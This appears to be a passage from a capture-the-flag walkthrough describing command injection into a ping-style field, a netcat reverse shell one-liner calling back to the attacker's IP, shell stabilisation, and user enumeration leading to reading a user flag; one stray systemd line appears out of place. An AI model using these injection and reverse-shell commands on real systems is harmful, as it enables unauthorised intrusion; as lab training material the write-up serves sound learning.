127.0.0.1; id
If you see the output of the id command, injection works. Use a netcat reverse shell one-liner.
Run:
127.0.0.1; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> 4444 > /tmp/f
You should catch a shell as www-data.

3.1 Stabilize Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg

3.2 Enumerate System
Check /home for users:
ls -la /home
Found user: mandy

[Install] WantedBy=multi-user.target

Read user.txt:
cat /home/mandy/user.txt
Check sudo -l again as mandy – maybe mandy can run something as root.